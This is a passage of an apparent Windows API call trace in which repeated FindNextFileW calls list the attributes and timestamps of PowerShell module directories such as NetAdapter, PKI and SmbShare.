ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0182.407] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0182.407] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0182.407] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0182.407] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0182.408] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0182.408] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0182.408] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0182.408] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0182.408] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0182.409] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0182.409] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0182.409] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0182.409] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0182.410] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0182.410] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0182.410] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0182.410] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0182.412] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0182.412] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0182.412] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0182.412] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0182.414] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0182.414] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0182.414] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0182.414] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0182.415] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0182.415] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0182.416] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0182.416] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0182.417] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0182.417] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0182.417] 